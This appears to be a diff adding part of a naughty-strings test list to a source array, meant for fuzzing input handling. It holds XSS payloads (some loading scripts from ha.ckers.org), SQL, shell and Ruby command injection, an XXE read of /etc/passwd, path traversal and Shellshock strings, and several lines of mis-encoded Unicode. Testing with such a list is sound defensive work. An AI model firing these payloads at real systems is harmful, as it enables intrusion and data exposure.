+ "￯ᄐᄡ￯ᄑネ￯ᄑナ ￯ᄑム￯ᄑユ￯ᄑノ￯ᄑテ￯ᄑヒ ￯ᄑツ￯ᄑメ￯ᄑマ￯ᄑラ￯ᄑホ ￯ᄑニ￯ᄑマ￯ᄑリ ￯ᄑハ￯ᄑユ￯ᄑヘ￯ᄑミ￯ᄑモ ￯ᄑマ￯ᄑヨ￯ᄑナ￯ᄑメ ￯ᄑヤ￯ᄑネ￯ᄑナ "
+ "￯ᄑフ￯ᄑチ￯ᄑレ￯ᄑル ￯ᄑト￯ᄑマ￯ᄑヌ",
+ "￰ンミモ￰ンミᄀ￰ンミ゙ ￰ンミᆰ￰ンミᆴ￰ンミᄁ￰ンミワ￰ンミᄂ ￰ンミロ￰ンミᆱ￰ンミᄄ￰ンミᄚ￰ンミᄃ ￰ンミ゚￰ンミᄄ￰ンミᄆ ￰ンミᆪ￰ンミᆴ￰ンミᆭ￰ンミᄅ￰ンミᆲ "
+ "￰ンミᄄ￰ンミᆵ￰ンミ゙￰ンミᆱ ￰ンミᆳ￰ンミᄀ￰ンミ゙ ￰ンミᆬ￰ンミレ￰ンミᄈ￰ンミᄇ "
+ "￰ンミン￰ンミᄄ￰ンミᅠ",
+ "￰ンユ﾿￰ンヨヘ￰ンヨハ ￰ンヨヨ￰ンヨレ￰ンヨホ￰ンヨネ￰ンヨミ ￰ンヨヌ￰ンヨラ￰ンヨヤ￰ンヨワ￰ンヨモ ￰ンヨヒ￰ンヨヤ￰ンヨン ￰ンヨマ￰ンヨレ￰ンヨメ￰ンヨユ￰ンヨリ "
+ "￰ンヨヤ￰ンヨロ￰ンヨハ￰ンヨラ ￰ンヨル￰ンヨヘ￰ンヨハ ￰ンヨム￰ンヨニ￰ンヨ゚￰ンヨ゙ "
+ "￰ンヨノ￰ンヨヤ￰ンヨフ",
+ "￰ンムᄏ￰ンメノ￰ンメニ ￰ンメメ￰ンメヨ￰ンメハ￰ンメト￰ンメフ ￰ンメテ￰ンメモ￰ンメミ￰ンメリ￰ンメマ ￰ンメヌ￰ンメミ￰ンメル ￰ンメヒ￰ンメヨ￰ンメホ￰ンメム￰ンメヤ "
+ "￰ンメミ￰ンメラ￰ンメニ￰ンメモ ￰ンメユ￰ンメノ￰ンメニ ￰ンメヘ￰ンメツ￰ンメロ￰ンメレ "
+ "￰ンメナ￰ンメミ￰ンメネ",
+ "￰ンモᆪ￰ンモᄆ￰ンモᆴ ￰ンモᄎ￰ンモᄒ￰ンモᄇ￰ンモᆲ￰ンモᄡ ￰ンモᆱ￰ンモᄏ￰ンモᄌ￰ンヤタ￰ンモᄋ ￰ンモᆵ￰ンモᄌ￰ンヤチ ￰ンモᄈ￰ンモᄒ￰ンモᄊ￰ンモᄍ￰ンモᄐ "
+ "￰ンモᄌ￰ンモ﾿￰ンモᆴ￰ンモᄏ ￰ンモᄑ￰ンモᄆ￰ンモᆴ ￰ンモᄉ￰ンモᆰ￰ンヤテ￰ンヤツ "
+ "￰ンモᆳ￰ンモᄌ￰ンモᄚ",
+ "￰ンユヒ￰ンユル￰ンユヨ ￰ンユᄁ￰ンユᆭ￰ンユレ￰ンユヤ￰ンユワ ￰ンユモ￰ンユᆪ￰ンユᅠ￰ンユᄄ￰ンユ゚ ￰ンユラ￰ンユᅠ￰ンユᄅ ￰ンユロ￰ンユᆭ￰ンユ゙￰ンユᄀ￰ンユᄂ "
+ "￰ンユᅠ￰ンユᄃ￰ンユヨ￰ンユᆪ ￰ンユᆬ￰ンユル￰ンユヨ ￰ンユン￰ンユメ￰ンユᆱ￰ンユᆰ "
+ "￰ンユユ￰ンユᅠ￰ンユリ",
+ "￰ンレテ￰ンレム￰ンレホ ￰ンレレ￰ンレ゙￰ンレメ￰ンレフ￰ンレヤ ￰ンレヒ￰ンレロ￰ンレリ￰ンレᅠ￰ンレラ ￰ンレマ￰ンレリ￰ンレᄀ ￰ンレモ￰ンレ゙￰ンレヨ￰ンレル￰ンレワ "
+ "￰ンレリ￰ンレ゚￰ンレホ￰ンレロ ￰ンレン￰ンレム￰ンレホ ￰ンレユ￰ンレハ￰ンレᆪ￰ンレᄁ "
+ "￰ンレヘ￰ンレリ￰ンレミ",
+ "¬メᆵ¬メᆪ¬メᅠ ¬メᆲ¬メᄚ¬メᄂ¬メ゙¬メᆭ ¬メン¬メᆳ¬メᆰ¬メᄇ¬メᄅ ¬メᄀ¬メᆰ¬メᄈ ¬メᆬ¬メᄚ¬メᄄ¬メᆱ¬メᆴ ¬メᆰ¬メᄆ¬メᅠ¬メᆳ ¬メᆵ¬メᆪ¬メᅠ ¬メᄃ¬メワ¬メᄉ¬メᄡ "
+ "¬メ゚¬メᆰ¬メᄁ",
+
+ // Script Injection
+ //
+ // Strings which attempt to invoke a benign script injection; shows vulnerability to XSS
+
+ "<script>alert(123)</script>", "&lt;script&gt;alert(&#39;123&#39;);&lt;/script&gt;", "<img src=x onerror=alert(123) />",
+ "<svg><script>123<1>alert(123)</script>", "\"><script>alert(123)</script>", "'><script>alert(123)</script>", "><script>alert(123)</script>",
+ "</script><script>alert(123)</script>", "< / script >< script >alert(123)< / script >", " onfocus=JaVaSCript:alert(123) autofocus",
+ "\" onfocus=JaVaSCript:alert(123) autofocus", "' onfocus=JaVaSCript:alert(123) autofocus", "￯ᄐワscript￯ᄐ゙alert(123)￯ᄐワ/script￯ᄐ゙",
+ "<sc<script>ript>alert(123)</sc</script>ript>", "--><script>alert(123)</script>", "\";alert(123);t=\"", "';alert(123);t='", "JavaSCript:alert(123)",
+ ";alert(123);", "src=JaVaSCript:prompt(132)", "\"><script>alert(123);</script x=\"", "'><script>alert(123);</script x='", "><script>alert(123);</script x=",
+ "\" autofocus onkeyup=\"javascript:alert(123)", "' autofocus onkeyup='javascript:alert(123)",
+ "<script\\x20type=\"text/javascript\">javascript:alert(1);</script>", "<script\\x3Etype=\"text/javascript\">javascript:alert(1);</script>",
+ "<script\\x0Dtype=\"text/javascript\">javascript:alert(1);</script>", "<script\\x09type=\"text/javascript\">javascript:alert(1);</script>",
+ "<script\\x0Ctype=\"text/javascript\">javascript:alert(1);</script>", "<script\\x2Ftype=\"text/javascript\">javascript:alert(1);</script>",
+ "<script\\x0Atype=\"text/javascript\">javascript:alert(1);</script>", "'`\"><\\x3Cscript>javascript:alert(1)</script>",
+ "'`\"><\\x00script>javascript:alert(1)</script>", "ABC<div style=\"x\\x3Aexpression(javascript:alert(1)\">DEF",
+ "ABC<div style=\"x:expression\\x5C(javascript:alert(1)\">DEF", "ABC<div style=\"x:expression\\x00(javascript:alert(1)\">DEF",
+ "ABC<div style=\"x:exp\\x00ression(javascript:alert(1)\">DEF", "ABC<div style=\"x:exp\\x5Cression(javascript:alert(1)\">DEF",
+ "ABC<div style=\"x:\\x0Aexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\x09expression(javascript:alert(1)\">DEF",
+ "ABC<div style=\"x:\\xE3\\x80\\x80expression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x84expression(javascript:alert(1)\">DEF",
+ "ABC<div style=\"x:\\xC2\\xA0expression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x80expression(javascript:alert(1)\">DEF",
+ "ABC<div style=\"x:\\xE2\\x80\\x8Aexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\x0Dexpression(javascript:alert(1)\">DEF",
+ "ABC<div style=\"x:\\x0Cexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x87expression(javascript:alert(1)\">DEF",
+ "ABC<div style=\"x:\\xEF\\xBB\\xBFexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\x20expression(javascript:alert(1)\">DEF",
+ "ABC<div style=\"x:\\xE2\\x80\\x88expression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\x00expression(javascript:alert(1)\">DEF",
+ "ABC<div style=\"x:\\xE2\\x80\\x8Bexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x86expression(javascript:alert(1)\">DEF",
+ "ABC<div style=\"x:\\xE2\\x80\\x85expression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x82expression(javascript:alert(1)\">DEF",
+ "ABC<div style=\"x:\\x0Bexpression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x81expression(javascript:alert(1)\">DEF",
+ "ABC<div style=\"x:\\xE2\\x80\\x83expression(javascript:alert(1)\">DEF", "ABC<div style=\"x:\\xE2\\x80\\x89expression(javascript:alert(1)\">DEF",
+ "<a href=\"\\x0Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x0Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xC2\\xA0javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x05javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE1\\xA0\\x8Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x18javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x11javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\x88javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\x89javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x17javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x03javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x0Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x1Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x00javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x10javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\x82javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x20javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x13javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x09javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\x8Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x14javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x19javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\xAFjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x1Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\x81javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x1Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\x87javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x07javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE1\\x9A\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\x83javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x04javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x01javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x08javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\x84javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\x86javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE3\\x80\\x80javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x12javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x0Djavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x0Ajavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x0Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x15javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\xA8javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x16javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x02javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x1Bjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x06javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\xA9javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x80\\x85javascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x1Ejavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\xE2\\x81\\x9Fjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"\\x1Cjavascript:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"javascript\\x00:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"javascript\\x3A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"javascript\\x09:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"javascript\\x0D:javascript:alert(1)\" id=\"fuzzelement1\">test</a>",
+ "<a href=\"javascript\\x0A:javascript:alert(1)\" id=\"fuzzelement1\">test</a>", "`\"'><img src=xxx:x \\x0Aonerror=javascript:alert(1)>",
+ "`\"'><img src=xxx:x \\x22onerror=javascript:alert(1)>", "`\"'><img src=xxx:x \\x0Bonerror=javascript:alert(1)>",
+ "`\"'><img src=xxx:x \\x0Donerror=javascript:alert(1)>", "`\"'><img src=xxx:x \\x2Fonerror=javascript:alert(1)>",
+ "`\"'><img src=xxx:x \\x09onerror=javascript:alert(1)>", "`\"'><img src=xxx:x \\x0Conerror=javascript:alert(1)>",
+ "`\"'><img src=xxx:x \\x00onerror=javascript:alert(1)>", "`\"'><img src=xxx:x \\x27onerror=javascript:alert(1)>",
+ "`\"'><img src=xxx:x \\x20onerror=javascript:alert(1)>", "\"`'><script>\\x3Bjavascript:alert(1)</script>", "\"`'><script>\\x0Djavascript:alert(1)</script>",
+ "\"`'><script>\\xEF\\xBB\\xBFjavascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x81javascript:alert(1)</script>",
+ "\"`'><script>\\xE2\\x80\\x84javascript:alert(1)</script>", "\"`'><script>\\xE3\\x80\\x80javascript:alert(1)</script>",
+ "\"`'><script>\\x09javascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x89javascript:alert(1)</script>",
+ "\"`'><script>\\xE2\\x80\\x85javascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x88javascript:alert(1)</script>",
+ "\"`'><script>\\x00javascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\xA8javascript:alert(1)</script>",
+ "\"`'><script>\\xE2\\x80\\x8Ajavascript:alert(1)</script>", "\"`'><script>\\xE1\\x9A\\x80javascript:alert(1)</script>",
+ "\"`'><script>\\x0Cjavascript:alert(1)</script>", "\"`'><script>\\x2Bjavascript:alert(1)</script>",
+ "\"`'><script>\\xF0\\x90\\x96\\x9Ajavascript:alert(1)</script>", "\"`'><script>-javascript:alert(1)</script>",
+ "\"`'><script>\\x0Ajavascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\xAFjavascript:alert(1)</script>",
+ "\"`'><script>\\x7Ejavascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x87javascript:alert(1)</script>",
+ "\"`'><script>\\xE2\\x81\\x9Fjavascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\xA9javascript:alert(1)</script>",
+ "\"`'><script>\\xC2\\x85javascript:alert(1)</script>", "\"`'><script>\\xEF\\xBF\\xAEjavascript:alert(1)</script>",
+ "\"`'><script>\\xE2\\x80\\x83javascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x8Bjavascript:alert(1)</script>",
+ "\"`'><script>\\xEF\\xBF\\xBEjavascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x80javascript:alert(1)</script>",
+ "\"`'><script>\\x21javascript:alert(1)</script>", "\"`'><script>\\xE2\\x80\\x82javascript:alert(1)</script>",
+ "\"`'><script>\\xE2\\x80\\x86javascript:alert(1)</script>", "\"`'><script>\\xE1\\xA0\\x8Ejavascript:alert(1)</script>",
+ "\"`'><script>\\x0Bjavascript:alert(1)</script>", "\"`'><script>\\x20javascript:alert(1)</script>", "\"`'><script>\\xC2\\xA0javascript:alert(1)</script>",
+ "<img \\x00src=x onerror=\"alert(1)\">", "<img \\x47src=x onerror=\"javascript:alert(1)\">", "<img \\x11src=x onerror=\"javascript:alert(1)\">",
+ "<img \\x12src=x onerror=\"javascript:alert(1)\">", "<img\\x47src=x onerror=\"javascript:alert(1)\">", "<img\\x10src=x onerror=\"javascript:alert(1)\">",
+ "<img\\x13src=x onerror=\"javascript:alert(1)\">", "<img\\x32src=x onerror=\"javascript:alert(1)\">", "<img\\x47src=x onerror=\"javascript:alert(1)\">",
+ "<img\\x11src=x onerror=\"javascript:alert(1)\">", "<img \\x47src=x onerror=\"javascript:alert(1)\">", "<img \\x34src=x onerror=\"javascript:alert(1)\">",
+ "<img \\x39src=x onerror=\"javascript:alert(1)\">", "<img \\x00src=x onerror=\"javascript:alert(1)\">", "<img src\\x09=x onerror=\"javascript:alert(1)\">",
+ "<img src\\x10=x onerror=\"javascript:alert(1)\">", "<img src\\x13=x onerror=\"javascript:alert(1)\">", "<img src\\x32=x onerror=\"javascript:alert(1)\">",
+ "<img src\\x12=x onerror=\"javascript:alert(1)\">", "<img src\\x11=x onerror=\"javascript:alert(1)\">", "<img src\\x00=x onerror=\"javascript:alert(1)\">",
+ "<img src\\x47=x onerror=\"javascript:alert(1)\">", "<img src=x\\x09onerror=\"javascript:alert(1)\">", "<img src=x\\x10onerror=\"javascript:alert(1)\">",
+ "<img src=x\\x11onerror=\"javascript:alert(1)\">", "<img src=x\\x12onerror=\"javascript:alert(1)\">", "<img src=x\\x13onerror=\"javascript:alert(1)\">",
+ "<img[a][b][c]src[d]=x[e]onerror=[f]\"alert(1)\">", "<img src=x onerror=\\x09\"javascript:alert(1)\">", "<img src=x onerror=\\x10\"javascript:alert(1)\">",
+ "<img src=x onerror=\\x11\"javascript:alert(1)\">", "<img src=x onerror=\\x12\"javascript:alert(1)\">", "<img src=x onerror=\\x32\"javascript:alert(1)\">",
+ "<img src=x onerror=\\x00\"javascript:alert(1)\">", "<a href=java&#1&#2&#3&#4&#5&#6&#7&#8&#11&#12script:javascript:alert(1)>XXX</a>",
+ "<img src=\"x` `<script>javascript:alert(1)</script>\"` `>", "<img src onerror /\" '\"= alt=javascript:alert(1)//\">",
+ "<title onpropertychange=javascript:alert(1)></title><title title=>",
+ "<a href=http://foo.bar/#x=`y></a><img alt=\"`><img src=x:x onerror=javascript:alert(1)></a>\">", "<!--[if]><script>javascript:alert(1)</script -->",
+ "<!--[if<img src=x onerror=javascript:alert(1)//]> -->", "<script src=\"/\%(jscript)s\"></script>", "<script src=\"\\%(jscript)s\"></script>",
+ "<IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\">", "<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>", "<IMG SRC=# onmouseover=\"alert('xxs')\">",
+ "<IMG SRC= onmouseover=\"alert('xxs')\">", "<IMG onmouseover=\"alert('xxs')\">",
+ "<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>",
+ "<IMG "
+ "SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#"
+ "0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>",
+ "<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>",
+ "<IMG SRC=\"jav ascript:alert('XSS');\">", "<IMG SRC=\"jav&#x09;ascript:alert('XSS');\">", "<IMG SRC=\"jav&#x0A;ascript:alert('XSS');\">",
+ "<IMG SRC=\"jav&#x0D;ascript:alert('XSS');\">", "perl -e 'print \"<IMG SRC=java\0script:alert(\"XSS\")>\";' > out",
+ "<IMG SRC=\" &#14; javascript:alert('XSS');\">", "<SCRIPT/XSS SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>",
+ "<BODY onload!#$%&()*~+-_.,:;?@[/|\\]^`=alert(\"XSS\")>", "<SCRIPT/SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", "<<SCRIPT>alert(\"XSS\");//<</SCRIPT>",
+ "<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >", "<SCRIPT SRC=//ha.ckers.org/.j>", "<IMG SRC=\"javascript:alert('XSS')\"",
+ "<iframe src=http://ha.ckers.org/scriptlet.html <", "\\\";alert('XSS');//", "<u oncopy=alert()> Copy me</u>", "<i onwheel=alert(1)> Scroll over me </i>",
+ "<plaintext>", "http://a/%%30%30", "</textarea><script>alert(123)</script>",
+
+ // SQL Injection
+ //
+ // Strings which can cause a SQL injection if inputs are not sanitized
+
+ "1;DROP TABLE users", "1'; DROP TABLE users-- 1", "' OR 1=1 -- 1", "' OR '1'='1", " ", "%", "_",
+
+ // Server Code Injection
+ //
+ // Strings which can cause user to run code on server as a privileged user (c.f. https://news.ycombinator.com/item?id=7665153)
+
+ "-", "--", "--version", "--help", "$USER", "/dev/null; touch /tmp/blns.fail ; echo", "`touch /tmp/blns.fail`", "$(touch /tmp/blns.fail)",
+ "@{[system \"touch /tmp/blns.fail\"]}",
+
+ // Command Injection (Ruby)
+ //
+ // Strings which can call system commands within Ruby/Rails applications
+
+ "eval(\"puts 'hello world'\")", "System(\"ls -al /\")", "`ls -al /`", "Kernel.exec(\"ls -al /\")", "Kernel.exit(1)", "%x('ls -al /')",
+
+ // XXE Injection (XML)
+ //
+ // String which can reveal system files when parsed by a badly configured XML parser
+
+ "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [ <!ELEMENT foo ANY ><!ENTITY xxe SYSTEM \"file:///etc/passwd\" >]><foo>&xxe;</foo>",
+
+ // Unwanted Interpolation
+ //
+ // Strings which can be accidentally expanded into different strings if evaluated in the wrong context, e.g. used as a printf format string or via Perl or
+ //shell eval. Might expose sensitive data from the program doing the interpolation, or might just represent the wrong string.
+
+ "$HOME", "$ENV{'HOME'}", "%d", "%s", "{0}", "%*.*s", "File:///",
+
+ // File Inclusion
+ //
+ // Strings which can cause user to pull in files that should not be a part of a web server
+
+ "../../../../../../../../../../../etc/passwd%00", "../../../../../../../../../../../etc/hosts",
+
+ // Known CVEs and Vulnerabilities
+ //
+ // Strings that test for known vulnerabilities
+
+ "() { 0; }; touch /tmp/blns.shellshock1.fail;", "() { _; } >_[$($())] { touch /tmp/blns.shellshock2.fail; }", "<<< %s(un='%s') = %u", "+++ATH0",
+
+ // MSDOS/Windows Special Filenames
+ //
+ // Strings which are reserved characters in MSDOS/Windows
+
+ "CON", "PRN", "AUX", "CLOCK$", "NUL", "A:", "ZZ:", "COM1", "LPT1", "LPT2", "LPT3", "COM2", "COM3", "COM4",
+
+ // IRC specific strings
+ //
+ // Strings that may occur on IRC clients that make security products freak out
+
+ "DCC SEND STARTKEYLOGGER 0 0 0",
+
+ // Scunthorpe Problem
+ //
+ // Innocuous strings which may be blocked by profanity filters (https://en.wikipedia.org/wiki/Scunthorpe_problem)
+
+ "Scunthorpe General Hospital", "Penistone Community Church", "Lightwater Country Park", "Jimmy Clitheroe", "Horniman Museum", "shitake mushrooms",
+ "RomansInSussex.co.uk", "http://www.cum.qc.ca/", "Craig Cockburn, Software Specialist", "Linda Callahan", "Dr. Herman I. Libshitz", "magna cum laude",
+ "Super Bowl XXX", "medieval erection of parapets", "evaluate", "mocha", "expression", "Arsenal canal", "classic", "Tyson Gay", "Dick Van Dyke", "basement",
+
+ // Human injection
+ //
+ // Strings which may cause human to reinterpret worldview
+
+ "If you're reading this, you've been in a coma for almost 20 years now. We're trying a new technique. We don't know where this message will end up in your "
+ "dream, but we hope it works. Please wake up, we miss you.",
+
+ // Terminal escape codes
+ //
+ // Strings which punish the fools who use cat/type on this file
+
+ "Roses are red, violets are blue. Hope you enjoy terminal hue", "But now...for my greatest trick...",
+ "The quick brown fox... [Beeeep]",
+
+ // iOS Vulnerabilities
+ //
+ // Strings which crashed iMessage in various versions of iOS
+
+ "Power￙ト￙マ￙ト￙マ￘ᄉ￙ム￘ᄄ￙マ￙ト￙マ￙ト￘ᄉ￙ム￘ᄄ￙マ￘ᄆ￘ᄆ￙ヒ ¢ᆬᆪ ¢ᆬᆪh ¢ᆬᆪ "
+ "¢ᆬᆪ¥ニラ",
+ "￰゚マᄈ0￰゚フネ￯ᄌマ"}; \ No newline at end of file
generated by cgit v1.2.3 (git 2.39.0) at 2024-06-18 16:33:20 +0300